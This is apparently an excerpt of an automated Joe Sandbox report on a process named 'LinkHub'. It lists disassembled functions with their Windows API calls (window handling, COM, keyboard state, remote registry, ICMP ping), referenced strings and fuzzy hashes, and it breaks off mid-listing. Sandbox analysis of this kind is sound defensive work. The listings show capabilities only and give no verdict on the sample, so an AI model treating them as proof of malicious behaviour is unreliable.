GetWindowRect.USER32(00000000,?), ref: 00E366E2
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00E36736
GetDlgItem.USER32(?,000003E9), ref: 00E36744
GetWindowRect.USER32(00000000,?), ref: 00E36756
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00E36798
GetDlgItem.USER32(?,000003EA), ref: 00E367AB
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00E367C1
InvalidateRect.USER32(?,00000000,00000001), ref: 00E367CE

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 980a97e6aee7bad6832546f6dc2e7b42d6e3c2a5e31bdf81e3f51e20f4a0de96
Instruction ID: db75ab3b66d04d48a07cc6cd75728edf8ba1d3d37e988363ad38091b3d21a199
Opcode Fuzzy Hash: 980a97e6aee7bad6832546f6dc2e7b42d6e3c2a5e31bdf81e3f51e20f4a0de96
Instruction Fuzzy Hash: C751FDB1F00209AFDB18CF69DD99AAEBBB5FB48354F508129F919F6290D770AD04CB50

Function 00DD2128 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00DD2234: GetWindowLongW.USER32(?,000000EB), ref: 00DD2242

GetSysColor.USER32(0000000F), ref: 00DD2152

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 6e0cf8111fd96388bf4ccb4b43232a10dbb24ea17b7aef6850e0ec4b5877fff0
Instruction ID: 6dd5f9ade7c15eaf946aa26042107f5aa2b2ac25af35fb4d46194e3f9a24859b
Opcode Fuzzy Hash: 6e0cf8111fd96388bf4ccb4b43232a10dbb24ea17b7aef6850e0ec4b5877fff0
Instruction Fuzzy Hash: C341F531604340AFDB209F399C48BBA3765EB62370F548256FAA2A73E1C771DD46DB20

Function 00DD13A6 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00E128D1
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00E128EA
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00E128FA
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00E12912
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00E12933
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00DD11F5,00000000,00000000,00000000,000000FF,00000000), ref: 00E12942
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00E1295F
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00DD11F5,00000000,00000000,00000000,000000FF,00000000), ref: 00E1296E

Strings

(, xrefs: 00E12885

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID: (
API String ID: 1268354404-2063206799
Opcode ID: 4751971de77c1a8e8747bf9ac3bff2be1eb5b8a8dae480889a42c2d41b2a7afb
Instruction ID: e8d6d2523a8df31af98815e5407ffe419ea0564fc0f89de34e6204df32859030
Opcode Fuzzy Hash: 4751971de77c1a8e8747bf9ac3bff2be1eb5b8a8dae480889a42c2d41b2a7afb
Instruction Fuzzy Hash: 88516C34A00209AFDB24CF29DC45BAA7BB5FF88764F10451DFA42A76A0D770E994DB60

Function 00E6955E Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00DD249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DD24B0

Part of subcall function 00DD19CD: GetCursorPos.USER32(?), ref: 00DD19E1
Part of subcall function 00DD19CD: ScreenToClient.USER32(00000000,?), ref: 00DD19FE
Part of subcall function 00DD19CD: GetAsyncKeyState.USER32(00000001), ref: 00DD1A23
Part of subcall function 00DD19CD: GetAsyncKeyState.USER32(00000002), ref: 00DD1A3D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 00E695C7
ImageList_EndDrag.COMCTL32 ref: 00E695CD
ReleaseCapture.USER32 ref: 00E695D3
SetWindowTextW.USER32(?,00000000), ref: 00E6966E
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00E69681
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 00E6975B

Strings

@GUI_DROPID, xrefs: 00E696AD
@GUI_DRAGFILE, xrefs: 00E696F6
(, xrefs: 00E6956D
(, xrefs: 00E69728

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID$($(
API String ID: 1924731296-3832140312
Opcode ID: fbd0f34c419ce4482baf053e2971c0824970583cda64348e4fdb89cd0ba71d56
Instruction ID: 6d8d2979286ca6e67425baa14c8233e1e388577e643796efe343c90dd568b9c6
Opcode Fuzzy Hash: fbd0f34c419ce4482baf053e2971c0824970583cda64348e4fdb89cd0ba71d56
Instruction Fuzzy Hash: 5C518D70644304AFD714EF25DC56FAA77E4FB88754F400A1EF956A72E2CB70A908CB62

Function 00E3A05C Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000001,?,00E20D31,00000001,0000138C,00000001,00000001,00000001,?,00E4EEAE,00EA2430), ref: 00E3A091
LoadStringW.USER32(00000000,?,00E20D31,00000001), ref: 00E3A09A

Part of subcall function 00DDB329: _wcslen.LIBCMT ref: 00DDB333

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00E20D31,00000001,0000138C,00000001,00000001,00000001,?,00E4EEAE,00EA2430,?), ref: 00E3A0BC
LoadStringW.USER32(00000000,?,00E20D31,00000001), ref: 00E3A0BF
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E3A1E0

Strings

Line %d (File "%s"):, xrefs: 00E3A109
%s (%d) : ==> %s: %s %s, xrefs: 00E3A1C4
Line %d:, xrefs: 00E3A11A
Error: , xrefs: 00E3A197
^ ERROR, xrefs: 00E3A175

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 354398ca14ca2b1ade705ad1b88794eb4b1f751a490f575185ce3062e949ff77
Instruction ID: 5391e9b9bbacd123ecf9415c90a034d546311579388369bfa371f116db03c6cc
Opcode Fuzzy Hash: 354398ca14ca2b1ade705ad1b88794eb4b1f751a490f575185ce3062e949ff77
Instruction Fuzzy Hash: 1E413D72800209AACF04EBE0DD46EEEB778EF18744F510066F505B2192EB756F49CBB1

Function 00E30FCF Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00DD8577: _wcslen.LIBCMT ref: 00DD858A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00E31093
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00E310AF
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00E310CB
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00E310F5
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00E3111D
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E31128
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E3112D

Strings

\IPC$, xrefs: 00E31075
\CLSID, xrefs: 00E31015
SOFTWARE\Classes\, xrefs: 00E30FFF

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: f944662719150ac28bbae2564135fd2d20013125216a56bbf16f71a0d38df5e8
Instruction ID: 431dcc0d45aced7f0eaea796b6fdb041dc094b0a02d3a052f0742b4b30b4e0dd
Opcode Fuzzy Hash: f944662719150ac28bbae2564135fd2d20013125216a56bbf16f71a0d38df5e8
Instruction Fuzzy Hash: 1F41F872C10229ABCF15EBA4EC45DEEB779FF08754F41406AE905B2260EB719E05CBA0

Function 00E64A34 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00E64AD9
CreateCompatibleDC.GDI32(00000000), ref: 00E64AE0
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00E64AF3
SelectObject.GDI32(00000000,00000000), ref: 00E64AFB
GetPixel.GDI32(00000000,00000000,00000000), ref: 00E64B06
DeleteDC.GDI32(00000000), ref: 00E64B10
GetWindowLongW.USER32(?,000000EC), ref: 00E64B1A
SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00E64B30
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00E64B3C

Strings

static, xrefs: 00E64A71

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: f66dbe8f826dec1e221a85535c49e9397fea5f8a1a07bb446d6cc1ed071bc2d7
Instruction ID: 3d13e1e04cae97a4b1e4a98a3004ab420761244be7c1acecbcba6db2817e2170
Opcode Fuzzy Hash: f66dbe8f826dec1e221a85535c49e9397fea5f8a1a07bb446d6cc1ed071bc2d7
Instruction Fuzzy Hash: 82317A71640219BFDF129FA5EC08FDB3BA9EF093A4F111211FA15B21A0C775D850DBA4

Function 00E3D11F Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00E3D1BE

Strings

\+, xrefs: 00E3D1CF
\+, xrefs: 00E3D151
info, xrefs: 00E3D15F
warning, xrefs: 00E3D1A7
question, xrefs: 00E3D177
blank, xrefs: 00E3D140
stop, xrefs: 00E3D18F
`+, xrefs: 00E3D1CA, 00E3D1CD

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: IconLoad
String ID: \+$\+$`+$blank$info$question$stop$warning
API String ID: 2457776203-3382907240
Opcode ID: c2e6fcd3490d8527426c8ebfd5c7b8048a3d12f9bf6b31356eb9927ac442bc23
Instruction ID: 27dec5730eeecf23eccf0ba8e08cf8f4868677f7cef360f357e735fbe22ec3cd
Opcode Fuzzy Hash: c2e6fcd3490d8527426c8ebfd5c7b8048a3d12f9bf6b31356eb9927ac442bc23
Instruction Fuzzy Hash: 8011B73565D30ABBEB055A54FC86DBB7BACDF05769F20102AF500B6181D7B56A408174

Function 00E5468D Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00E546B9
CoInitialize.OLE32(00000000), ref: 00E546E7
CoUninitialize.OLE32 ref: 00E546F1
_wcslen.LIBCMT ref: 00E5478A
GetRunningObjectTable.OLE32(00000000,?), ref: 00E5480E
SetErrorMode.KERNEL32(00000001,00000029), ref: 00E54932
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00E5496B
CoGetObject.OLE32(?,00000000,00E70B64,?), ref: 00E5498A
SetErrorMode.KERNEL32(00000000), ref: 00E5499D
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00E54A21
VariantClear.OLEAUT32(?), ref: 00E54A35

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: 26658c832f06c065e32b45b77a0d262ea52f033a960e428679c205c9e2d96acf
Instruction ID: 9437dd06bce14b1ddee80cfd24951358c26f1650133c4e402128ba494a79dda8
Opcode Fuzzy Hash: 26658c832f06c065e32b45b77a0d262ea52f033a960e428679c205c9e2d96acf
Instruction Fuzzy Hash: 67C179B16083019FC704DF68C88596BBBE9FF89349F00591DF889AB250DB70ED49CB62

Function 00E484DB Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00E48538
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00E485D4
SHGetDesktopFolder.SHELL32(?), ref: 00E485E8
CoCreateInstance.OLE32(00E70CD4,00000000,00000001,00E97E8C,?), ref: 00E48634
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00E486B9
CoTaskMemFree.OLE32(?,?), ref: 00E48711
SHBrowseForFolderW.SHELL32(?), ref: 00E4879C
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00E487BF
CoTaskMemFree.OLE32(00000000), ref: 00E487C6
CoTaskMemFree.OLE32(00000000), ref: 00E4881B
CoUninitialize.OLE32 ref: 00E48821

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: ba95da1db578d3e57d18dbc32f47ccba8d5c5cce3f39de55a9b9e31f9b20c480
Instruction ID: 1f01d35c64af733c13d12579dffbf716a5b9484947e449c025dd21f18b4527df
Opcode Fuzzy Hash: ba95da1db578d3e57d18dbc32f47ccba8d5c5cce3f39de55a9b9e31f9b20c480
Instruction Fuzzy Hash: 41C11975A00109AFCB14DFA5D988DAEBBF5FF48344B158499E419EB361CB30ED45CBA0

Function 00E30378 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00E3039F
SafeArrayAllocData.OLEAUT32(?), ref: 00E303F8
VariantInit.OLEAUT32(?), ref: 00E3040A
SafeArrayAccessData.OLEAUT32(?,?), ref: 00E3042A
VariantCopy.OLEAUT32(?,?), ref: 00E3047D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00E30491
VariantClear.OLEAUT32(?), ref: 00E304A6
SafeArrayDestroyData.OLEAUT32(?), ref: 00E304B3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E304BC
VariantClear.OLEAUT32(?), ref: 00E304CE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E304D9

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: dbafab63a8ea60cf2deb04d751302bdafce5e04260a99c25dd2f9ebdc3e8150d
Instruction ID: c064abe247c4c33bd8ab16901952813b73796600ef68f77be5cdf0e3aae4a28e
Opcode Fuzzy Hash: dbafab63a8ea60cf2deb04d751302bdafce5e04260a99c25dd2f9ebdc3e8150d
Instruction Fuzzy Hash: 29416E31E002199FCB14DFA5DC589AEBFB9EF48354F008069E965B7261CB70AE45CBA0

Function 00E3A635 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00E3A65D
GetAsyncKeyState.USER32(000000A0), ref: 00E3A6DE
GetKeyState.USER32(000000A0), ref: 00E3A6F9
GetAsyncKeyState.USER32(000000A1), ref: 00E3A713
GetKeyState.USER32(000000A1), ref: 00E3A728
GetAsyncKeyState.USER32(00000011), ref: 00E3A740
GetKeyState.USER32(00000011), ref: 00E3A752
GetAsyncKeyState.USER32(00000012), ref: 00E3A76A
GetKeyState.USER32(00000012), ref: 00E3A77C
GetAsyncKeyState.USER32(0000005B), ref: 00E3A794
GetKeyState.USER32(0000005B), ref: 00E3A7A6

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 8ed303072473c4978c189c914801af5852ad7102e559fff4b6566e536bfb9a83
Instruction ID: 1efebea4c313ca7f5c779bcc91ceef8697c9c4e946a51e8855a9a63331a06d0d
Opcode Fuzzy Hash: 8ed303072473c4978c189c914801af5852ad7102e559fff4b6566e536bfb9a83
Instruction Fuzzy Hash: 3D41D6746047C96EFF319660C84D3A5BEB06B1134CF4CA06ED5C66A5C2EB9499C8CB93

Function 00E50FB8 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00E51019
inet_addr.WSOCK32(?), ref: 00E51079
gethostbyname.WSOCK32(?), ref: 00E51085
IcmpCreateFile.IPHLPAPI ref: 00E51093
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00E51123
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00E51142
IcmpCloseHandle.IPHLPAPI(?), ref: 00E51216
WSACleanup.WSOCK32 ref: 00E5121C

Strings

Ping, xrefs: 00E510D3

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 88eec3bead05a993e8bd8ca6ab8f3b3147193d39d3180a7b5c1663d3f364b915
Instruction ID: 9af38cf4fba594fea68bb6da28a348dcbc7922f2ab3279b20571d84a5bd9232f
Opcode Fuzzy Hash: 88eec3bead05a993e8bd8ca6ab8f3b3147193d39d3180a7b5c1663d3f364b915
Instruction Fuzzy Hash: 5B91DF316086419FD720DF15C988F16BBE0EF44318F1489E9F969AB7A2C770ED89CB91

Function 00E59730 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00E59750

Part of subcall function 00E39805: _wcslen.LIBCMT ref: 00E39828

_wcslen.LIBCMT ref: 00E597AB
_wcslen.LIBCMT ref: 00E597F9
_wcslen.LIBCMT ref: 00E59839
_wcslen.LIBCMT ref: 00E598CB

Strings

stdcall, xrefs: 00E59833, 00E59838
none, xrefs: 00E598C2, 00E598C7
cdecl, xrefs: 00E597A5, 00E597AA
winapi, xrefs: 00E597F3, 00E597F8

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: 50e5b7a81ec4819ac0f48f0667fc7ba2673938c20d50b202ffc7c3d5dd27c96d
Instruction ID: a6f1f61d2f2b69da2bf9f57b243fde1e09f4130da0b28751c0c7d39ed2291dfa
Opcode Fuzzy Hash: 50e5b7a81ec4819ac0f48f0667fc7ba2673938c20d50b202ffc7c3d5dd27c96d
Instruction Fuzzy Hash: B551D131A00116DBCF14DF68C9419FEB3A5EF55369B215A2AE826F7382DB31DD44C7A0

Function 00E54189 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00E541D1
CoUninitialize.OLE32 ref: 00E541DC
CoCreateInstance.OLE32(?,00000000,00000017,00E70B44,?), ref: 00E54236
IIDFromString.OLE32(?,?), ref: 00E542A9
VariantInit.OLEAUT32(?), ref: 00E54341
